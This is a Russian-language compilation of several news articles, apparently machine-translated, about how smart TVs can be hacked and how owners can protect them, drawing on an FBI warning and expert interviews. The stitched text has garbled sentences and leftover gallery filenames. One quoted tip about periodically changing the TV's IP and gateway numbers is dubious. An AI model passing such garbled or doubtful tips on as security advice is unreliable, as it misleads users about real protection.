Он сказал, что дает хакерам легкий доступ к вашим финансовым данным.

«Поскольку информация о кредитной карте находится на устройстве или подключена к учетной записи, к которой вы можете получить доступ с этого устройства, банковские счета людей взламываются и скомпрометированы», — сказал он.

Если ваш смарт-телевизор имеет встроенную камеру, киберпреступники могут следить за вами. ФБР даже предупредило потребителей об этой угрозе в праздничные дни.

«Камеру и микрофон можно включать удаленно через веб-браузер», — сказал Мартинес.

Итак, что вы можете сделать, чтобы защитить себя от хакеров?

Как хакеры проникают в ваш смарт-телевизор

Мартинес сказал, что вы можете выключить смарт-телевизор, когда вы им не пользуетесь, добавить брандмауэр, если у вас его нет (большинство маршрутизаторов имеют встроенные брандмауэры), загрузить антивирусное приложение и использовать не словарь пароль от вашего вайфая. Он должен состоять из прописных и строчных букв и специальных символов.

«Вы будете удивлены, сколько людей здесь, в Висконсине, имеют Packers», — сказал Мартинес.

Чтобы еще больше усложнить задачу хакерам, вы можете изменить некоторые данные, назначенные вашему Smart TV, такие как ваш IP-адрес, который похож на номер телефона вашего Smart TV. Мартинес сказал, что вы также захотите изменить номер шлюза, назначенный вашему телевизору. Он сказал, что неплохо менять эти цифры несколько раз в год.

«Вы значительно усложняете этим людям и приложениям взлом этого устройства, — продолжил он.

Сообщить об опечатке или ошибке

Ваш Smart TV может быть взломан! Вот как защитить его от вредоносных программ

Хакеры могут получить доступ к камере и микрофону смарт-телевизора с помощью вредоносного ПО.Они могут использовать кадры из спальни или гостиной, чтобы впоследствии шантажировать пользователей и их семьи.

Знаете ли вы, что ваш смарт-телевизор можно взломать? Ну, это может быть, и вы должны сделать что-то, чтобы защитить его. Теперь не расстраивайтесь, вы не единственный человек, который не знал, что это может произойти. Согласно опросу NordNPN, около 60% людей имеют дома смарт-телевизоры, и каждый четвертый из них ничего не делает для защиты своих смарт-устройств от вредоносного ПО.

Риск высок. Даже ФБР было достаточно обеспокоено, чтобы в 2019 году выпустить предупреждение, в котором люди информировались об их смарт-телевизорах и о том, как они могут сделать их уязвимыми для слежки и атак со стороны киберпреступников и злоумышленников. А с 2019 года технологии немного продвинулись вперед, поэтому сейчас нужно учитывать и другие факторы.

«Как и любое устройство, которое регулярно подключается к Интернету, умные телевизоры собирают много личных данных, что приводит к различным проблемам конфиденциальности и безопасности.Но, в отличие от других интеллектуальных устройств, они не могут быть оснащены новейшим программным обеспечением кибербезопасности (например, антивирусом), что делает их еще более уязвимыми для киберпреступников», — говорит эксперт по цифровой безопасности NordVPN Дэниел Маркусон.

Что нам следует опасаться, когда речь идет об умных телевизорах?

При использовании смарт-телевизоров вероятность того, что кто-то действительно смотрит или слушает пользователей, конечно, намного выше, чем при использовании традиционного телевизора. Хакеры могут получить доступ к камере и микрофону смарт-телевизора через вредоносное ПО, которое они могут внедрить в телевизор пользователя, если он подключен к Wi-Fi, что в большинстве случаев так и есть.Они могут использовать кадры из спальни или гостиной, чтобы впоследствии шантажировать пользователей и их семьи. Однажды ЦРУ создало вредоносное ПО, которое позволяло им проникать в систему и прослушивать пользователей через их смарт-телевизоры Samsung. Если они смогли это сделать, то смогут и хакеры.

Отслеживание — еще одна проблема, о которой должны беспокоиться пользователи. Как и любое смарт-устройство, смарт-телевизоры используют множество трекеров. Такие сервисы, как Netflix, Hulu или HBO GO, собирают данные пользователей и отслеживают их потоковое поведение, чтобы персонализировать их взаимодействие с платформами.Проблема в том, что вы никогда не знаете, где могут оказаться ваши данные, поскольку крупные компании постоянно сталкиваются с утечкой данных. Вышеупомянутые стриминговые сервисы не являются исключением из правил.

Кроме того, если смарт-телевизор используется для просмотра веб-страниц, он также может быть заражен различными вирусами. Как и компьютеры, умные телевизоры работают на программном обеспечении, но на них не установлены такие же мощные антивирусы и брандмауэры. После заражения телевизора вся история просмотров, пароли и другие личные данные становятся доступными для хакеров.И они не упустят возможности использовать эту информацию в атаках программ-вымогателей или продать ее в даркнете.

Как улучшить безопасность вашего смарт-телевизора

«Вам не нужно выбирать между отличным онлайн-телевидением и надежной защитой — возможно иметь и то, и другое. Поскольку мировой рынок смарт-телевизоров в прошлом году достиг 202,1 миллиарда долларов, нам необходимо научиться правильно защищать эти устройства», — сказал Маркусон.

И вот как вы можете это сделать:

Используйте надежные пароли

Если ваш телевизор регулярно или постоянно подключен к Интернету, убедитесь, что само устройство, а также любые приложения, установленные на нем, используют надежные, жесткие -угадывать пароли.Хороший пароль должен быть длинным, сложным и рандомизированным, состоящим из комбинации цифр и букв.

Всегда обновляйте программное обеспечение вашего телевизора при появлении новой версии

Эксперт говорит, что обновления программного обеспечения имеют решающее значение для кибербезопасности, поскольку производители делают все возможное для устранения уязвимостей. Обновления часто устраняют недостатки безопасности, исправляют или удаляют различные ошибки, добавляют новые функции и улучшают существующие.

Защитите свой маршрутизатор

Наряду с любыми другими устройствами IoT, которые у вас могут быть, ваш Smart TV, вероятно, будет подключаться к Интернету через маршрутизатор в вашем доме.Убедитесь, что ваш маршрутизатор максимально безопасен и защищен. Конечно, надежные пароли необходимы, но вы также можете включить VPN для своего маршрутизатора, чтобы шифровать любые данные, проходящие через него.

Скачивать приложения только из официальных магазинов

Не устанавливайте на свой Smart TV никакие программы и игры из неофициальных источников. Убедитесь, что и приложение, и его провайдер надежны. Более того, если приложение запрашивает доступ к вашим данным, камере или микрофону, который не нужен для его работы, никогда не предоставляйте его.

Выключайте камеру телевизора, когда она не используется

Будь то встроенная камера или камера, подключенная к телевизору через Wi-Fi, выключайте ее, когда она не используется. Если вы не можете выключить камеру, заклейте объектив скотчем или наклейкой.

ваш умный телевизор может быть взломан. Обновите пароль сейчас

Потребители, остерегайтесь умного телевизора в вашей гостиной. Как мы уже говорили вам раньше, он может шпионить за вами.

Теперь даже ФБР соглашается.Филиал в Орегоне опубликовал заявление, призывающее покупателей в Черную пятницу знать о возможностях взлома их новых покупок.

«Помимо риска того, что производитель вашего телевизора и разработчики приложений могут подслушивать и наблюдать за вами, это телевидение также может быть воротами для хакеров, которые могут проникнуть в ваш дом», — говорится в сообщении ФБР.

Поясним.

Смарт-телевизоры таких производителей, как Samsung, LG, Sony и Vizio, устраняют необходимость в потоковом аксессуаре , поскольку они имеют встроенные приложения для подключения к интернет-программам, например Netflix, Hulu и Amazon Prime.

Но поскольку они подключаются к Интернету, теперь у вас в гостиной есть двусторонняя машина. Компании, производящие наборы, могут отслеживать ваши привычки просмотра: что вы смотрите, когда вы смотрите и как часто, и продавать эти данные третьим лицам, если вы не откажетесь от этого, что обычно можно сделать в настройках. Некоторые производители просят вас согласиться на это, когда вы настраиваете телевизор, или заставляют вас войти и отказаться после факта.

В некоторых телевизорах есть микрофоны, в которые хакеры могут проникнуть, чтобы подслушать разговор в гостиной.Например, телевизоры Amazon Fire от Toshiba и Insignia позволяют попросить Alexa включать и выключать телевизор. А Samsung продает телевизоры со встроенными камерами для видеочата и т. д. с 2012 года.

В некоторых случаях, сообщает ФБР, «камеры используются для распознавания лиц, поэтому телевизор знает, кто смотрит, и может предложить соответствующие программы». Недавно Facebook представила новое устройство для видеочата Portal TV, которое подключается к телевизору и позволяет вести видеочат на огромном экране в гостиной.

Еще одна утечка данных: T-Mobile заявляет, что хакеры получили доступ к данным некоторых клиентов беспроводной связи

Рекламные результаты поиска: Alexa, ты не можешь остановить всю эту рекламу на Amazon?

«В худшем случае (хакеры) могут включить камеру и микрофон телевизора в вашей спальне и незаметно преследовать вас в киберпространстве», — сообщает ФБР.«Злоумышленник может не иметь прямого доступа к вашему заблокированному компьютеру, но вполне возможно, что ваш незащищенный телевизор может предоставить ему или ей легкий путь через черный ход через ваш маршрутизатор».

Так что помните, ребята, выбирайте хороший, безопасный и уникальный пароль для вашего домашнего роутера. Если вы не меняли его какое-то время, то самое время это сделать в праздники.

С помощью легко взломанного пароля хакеры «могут переключать каналы, играть с громкостью и показывать вашим детям неприемлемые видео», — говорится в сообщении ФБР.

Кроме того, еще один совет: заклейте телекамеру черной изолентой.

Подписывайтесь на Джефферсона Грэма из USA TODAY в Твиттере, @jeffersongraham

Хакеры атакуют владельцев Smart TV, которым не хватает надежной кибербезопасности . Некоторые из вас могут впервые приобрести Smart TV, подключив его к Интернету. News5 беседует с экспертами, которые говорят, что если вы не будете осторожны, то новое телевидение может стать каналом для хакеров.

Очень удобно иметь новый телевизор, который работает так же, как компьютер или смартфон, вы можете транслировать шоу и фильмы и даже просматривать веб-страницы, но эксперты по кибербезопасности говорят, что на самом деле это может создать возможность для хакеров проникнуть прямо в ваш дом. .

«Вам трудно найти телевизор, который не является смарт-телевизором. Все хотят быть на связи», — сказал член правления Национального центра кибербезопасности Лесли Кершоу. «Так что да. Я думаю, что это одно из тех устройств, которые чаще всего подвергаются взлому.»

Имея опыт расследования киберпреступлений для Министерства внутренней безопасности, Кершоу теперь работает с Национальным центром кибербезопасности в Колорадо-Спрингс и обеспокоен уязвимостью неподготовленных владельцев Smart TV.

. У хакера такое же мышление. Ты собираешься преследовать дом с забором, сигнализацией и собакой? Или вы пойдете за домом, который полностью открыт, и вы знаете, что никого нет дома», — сказал Кершоу.

Она говорит, что хакеры проникают через Wi-Fi-соединение, потому что у людей нет надежных паролей или они используют приложения или веб-браузер незащищенным образом, что дает хакерам легкий доступ к вашим данным, конфиденциальной информации, а в некоторых случаях даже финансовая информация, хранящаяся в определенных профилях или учетных записях.

«Как только вы получите свое устройство домой, вы должны сразу же обновить его, потому что есть параметры безопасности, которые должны быть установлены, и, возможно, они не знали об уязвимости, а теперь знают», — сказал Кершоу.

Но вы можете подумать, что хакер никак не может проникнуть в мой Smart TV, верно? Ну, этот потребитель, который не хотел, чтобы его назвали, говорит, что хакеры взяли под контроль его телевизор и пытались убедить его заплатить им за два года платных каналов.

«Как они смогли взломать AT&T, чтобы я попал на Showtime, это довольно удивительно», — сказал он. отказался делать.

«Они точно знали мой счет AT&T, они знали мой адрес, номер мобильного телефона, номер домашнего телефона», — сказал он.

Марк Феттерхофф из AARP Colorado говорит, что он обеспокоен тем, что люди становятся жертвами подобных мошеннических схем технической поддержки, если их Smart TV не защищены от хакеров.

«Вы всегда можете отключить это устройство и прервать связь с мошенником», — сказал Феттерхофф.

Еще одна особенность, вызывающая обеспокоенность экспертов по поводу того, что люди не привыкли пользоваться телевизорами, заключается в том, что некоторые телевизоры Smart TV имеют встроенные камеры и микрофоны, которые могут использовать хакеры.

«Если у них есть камеры, если у них есть подслушивающие устройства, если у них есть другие типы вещей, которые можно использовать во благо, их можно использовать и во зло», — сказал Феттерхофф.

«Чтобы кто-то действительно мог видеть вас визуально и слышать, что происходит в вашем доме», — сказал Кершоу.

Вот несколько шагов, которые вы можете предпринять, чтобы защитить свой Smart TV:

— Наклейте ленту на камеру вашего Smart TV, если она есть

— Выключите телевизор, когда он не используется

— рассмотрите возможность установки брандмауэра или загрузки антивирусного приложения, которому вы доверяете

— используйте разные надежные пароли, чтобы усложнить задачу хакерам Если вы покупаете подержанный Smart TV, эксперты говорят, что вы должны обязательно восстановить заводские настройки этого телевизора, чтобы избежать каких-либо вредоносных программ, которые уже могли быть загружены на это устройство.

Если у вас есть какие-либо вопросы или нужен совет:

Национальный Cybersecurity Center
3650 N Nevada Ave
Colorado Springs, Co 80907
719-255-5225

AARP Colorado
Телефон: 1-866-554- 5376 (звонок бесплатный)
Эл. -камеры и микрофоны.Однако, поскольку они всегда подключены к Интернету, эти телевизоры могут представлять потенциальный риск.

Хакеры, получившие доступ, могут управлять вашим телевизором и изменять определенные настройки. Используя встроенные камеры и микрофоны, умный и способный хакер может следить за вашими разговорами. В ноябре 2019 года ФБР опубликовало предупреждение о рисках, связанных с использованием смарт-телевизоров, для вашей конфиденциальности и предложило несколько рекомендаций.

ФБР отметило, что производители телевизоров и разработчики приложений могут вас слушать и смотреть.Но потенциально более серьезная угроза исходит от злоумышленников, которые получают доступ к вашему незащищенному телевизору и берут под свой контроль, переключая каналы, регулируя уровни громкости и даже показывая неприемлемый контент детям. В худшем случае они могут включить камеру и микрофон вашего телевизора, чтобы шпионить за вами, или использовать этот доступ, чтобы найти лазейку в вашем маршрутизаторе и других подключенных устройствах.

Передовой опыт ФБР

Все это звучит как наихудший сценарий ночного кошмара, но он не должен вызывать у вас страх использовать свой смарт-телевизор.ФБР предлагает несколько рекомендаций и передовых методов для обеспечения вашей безопасности и конфиденциальности:

  • Знайте, какие функции есть у вашего телевизора и как ими управлять. Выполните простой поиск в Интернете, указав номер модели и слова «микрофон», «камера» и «конфиденциальность».
  • Не зависеть от настроек безопасности по умолчанию. Смените пароли, если можете, и знайте, как отключить микрофоны, камеры и сбор личной информации, если это возможно. Если вы не можете отключить их, подумайте, готовы ли вы рискнуть, купив эту модель или воспользовавшись этой услугой.
  • Если вы не можете выключить камеру, но хотите это сделать, простой кусок черной изоленты поверх глазка камеры — это верный вариант.
  • Проверьте возможность производителя обновлять ваше устройство с помощью исправлений безопасности. Может ли это сделать? Делал ли он это в прошлом?
  • Ознакомьтесь с политикой конфиденциальности производителя телевизора и используемых вами потоковых сервисов. Подтвердите, какие данные они собирают, как они хранят эти данные и что они делают с ними.

Что говорят эксперты

Помимо совета ФБР, мы привлекли к этому вопросу отраслевых экспертов.Стивен Хидучак, генеральный директор службы проверки личности Aver, и Джозеф Карсон, главный специалист по безопасности и консультант по информационной безопасности в компании по управлению привилегированным доступом Thycotic, пролили свет на взлом телевидения.

Каковы потенциальные риски и опасности для владельцев Smart TV от хакеров?
Hyduchak
: Риск исходит от всего, что связано с микрофонами, камерами и датчиками. Интеллектуальный анализ данных, основанный на том, что вы смотрите и где вы находитесь, также ценен на рынке данных, поэтому эти вещи также становятся риском.

Карсон: Смарт-телевизоры — это в основном компьютеры с операционной системой. Те же риски, что и для компьютеров, применимы и к смарт-телевизорам. У большинства смарт-телевизоров есть камеры, микрофон и файловая система. Если киберпреступник получит доступ к вашему смарт-телевизору, который, вероятно, подключен к Интернету, это будет означать, что злоумышленник сможет увидеть вас через вашу камеру, подслушать ваши разговоры и украсть ваши данные. Злоумышленник также может использовать ваш смарт-телевизор для перехода на другие устройства в вашей домашней сети.Это включает в себя ваши ноутбуки или другие персональные устройства, включая сетевое хранилище.

Насколько реальны и распространены эти риски и угрозы? Эта угроза преувеличена или это то, о чем должны беспокоиться все владельцы умных телевизоров?
Гидучак
: Риск реален. В 2018 году китайская компания Huawei, производящая всевозможную бытовую электронику, обнаружила в своих продуктах «черные ходы». Это позволило им получить доступ к данным телефона по своему усмотрению. Многие в правительстве США выступили и немедленно рекомендовали прекратить использование всей их продукции.

Карсон: Угроза очень реальна. Когда это возможно, киберпреступник собирается в полной мере воспользоваться этим.

Были ли случаи, когда производители телевизоров использовали умные телевизоры для слежки за пользователями, намеренно или случайно?
Hyduchak
: Еще в 2017 году Vizio продавала данные со своих телевизоров и была оштрафована FTC. Раз в секунду программное обеспечение телевизоров Vizio считывало данные о пикселях с сегмента экрана. Это было отправлено домой и сравнено с базой данных фильмов, телевидения и рекламы, чтобы определить, что смотрят.

Были ли случаи, когда хакеры получали доступ к Smart TV, а затем могли найти другую информацию в домашней сети пользователя?
Hyduchak
: ФБР и ЦРУ предупреждают, что наши телевизоры могут быть окном в вашу сеть. Данные о нарушениях трудно найти, потому что большинство из них молчат. Но будьте уверены, что когда Roku выпускает исправления для уязвимостей, это не ошибка и не причина для этого исправления.

Карсон: Абсолютно.Я лично даже использовал его в тестах на проникновение в прошлом, используя камеру и микрофон телевизора.

Делают ли производители телевизоров что-нибудь, чтобы устранить уязвимости смарт-телевизоров?
Hyduchak
: Они более прозрачны в отношении своего использования, и такие вещи, как Калифорнийский закон о защите прав потребителей (CCPA), предписывают раскрытие использования данных.

Рекомендовано нашими редакторами

Карсон: Откровенно говоря, когда никто не жалуется, и не афишируют, что стали жертвой, производители телевизоров не торопятся улучшать системы безопасности или патчить системы.

Помимо рекомендаций, предложенных в предупреждении ФБР, что еще должны сделать заинтересованные владельцы умных телевизоров, чтобы защитить себя и свою конфиденциальность?
Hyduchak
: убедитесь, что ваши продукты всегда оснащены новейшим программным обеспечением, и убедитесь, что продукты, подобные продуктам Huawei, не находятся в вашей спальне, не говоря уже о вашем доме.

Карсон: Я бы порекомендовал вам всегда узнавать, какие функции включены на вашем смарт-телевизоре, которые создают риск, а затем решать, нужны они вам или нет.Вы также должны держать свой Smart TV исправленным и полностью выключать его, когда вы его не используете.

Существуют также определенные действия, которым должны следовать владельцы телевизоров определенных марок.

Телевизоры Sony с Android используют магазин Google Play, который включает Google Play Protect для сканирования всех приложений Android на телевизоре на наличие вредоносных программ до и после их загрузки на телевизор. По словам Sony, владельцы таких телевизоров могут изменить настройки Android TV по умолчанию, чтобы получать доступ к приложениям только через Google Play Store или загружать приложения только через USB.

В строке Sony Select главного экрана Android TV можно установить приложение ESET Smart TV Security, чтобы обеспечить защиту от проблем с безопасностью Android и USB-устройств, подключенных к телевизору, а также предотвратить несанкционированный доступ к данным при подключении.

Нравится то, что вы читаете?

Подпишитесь на информационный бюллетень Tips & Tricks , чтобы получить советы экспертов, чтобы получить максимальную отдачу от вашей технологии.

Этот информационный бюллетень может содержать рекламу, предложения или партнерские ссылки.Подписка на информационный бюллетень означает ваше согласие с нашими Условиями использования и Политикой конфиденциальности. Вы можете отказаться от подписки на информационные бюллетени в любое время.

ФБР просит людей заклеить камеры смарт-ТВ черной изолентой для защиты от хакеров | The Independent

Пока люди пользуются распродажами в Черную пятницу и Киберпонедельник, ФБР предупредило тех, кто покупает смарт-телевизоры, что мошенники могут использовать некоторые из них как окно в ваш дом.

По данным бюро разведывательного управления Портленда, штат Орегон, которое выпустило на прошлой неделе напоминание, полезные функции смарт-телевизора, такие как подключение к Интернету, микрофоны и камеры, также являются средством, которое хакеры могут использовать для получения доступа к вашему дому. .

«Помимо риска того, что производитель вашего телевизора и разработчики приложений могут подслушивать и наблюдать за вами, это телевидение также может быть воротами для хакеров, которые могут проникнуть в ваш дом», — пишет ФБР. «Злоумышленник может не иметь прямого доступа к вашему заблокированному компьютеру, но вполне возможно, что ваш незащищенный телевизор может предоставить ему или ей легкий путь через черный ход через ваш маршрутизатор».

Взлом может варьироваться от возможности «переключать каналы, играть с громкостью и показывать своим детям неприемлемые видео» до использования камеры и микрофона телевизора для «киберпреследования», предупредило бюро.

К счастью, есть способы пользоваться преимуществами смарт-телевизора, защищая себя.

10 лучших смарт-телевизоров

Показать все 10

1/1010 лучших смарт-телевизоров

10 лучших умных телевизоров

606794.bin

606795.bin

10 лучших смартвых телевизоров

606796.bin

10 лучших смартвых телевизоров

606797.bin

10 лучших смарт-телевизоров

606798.bin

10 лучших смарт-телевизоров

606799.Bin

10 лучших умных телевизоров

606800.bin
906800.bin

10 лучших смартвых телевизоров

606801.bin

10 лучших смартвых телевизоров

606802.bin

10 лучших смартвых телевизоров

0
606803.bin

Если у вас есть смарт-телевизор, первое, что вы должны сделать, это «точно знать, какие функции есть у вашего телевизора и как управлять этими функциями», согласно ФБР, что легко сделать, выполнив простой поиск в Интернете по номеру вашей модели. и ключевые слова, такие как «камера» или «микрофон».

Потребители также не должны зависеть от настроек безопасности по умолчанию, советует ФБР, и должны знать, как отключить микрофоны, камеры и сбор личной информации, если это возможно. Если модель телевизора не позволяет выключить камеру, ФБР предлагает заклеить ее черной изолентой — или подумать, «готовы ли вы рискнуть, купив эту модель или воспользовавшись этой услугой».

Leave a comment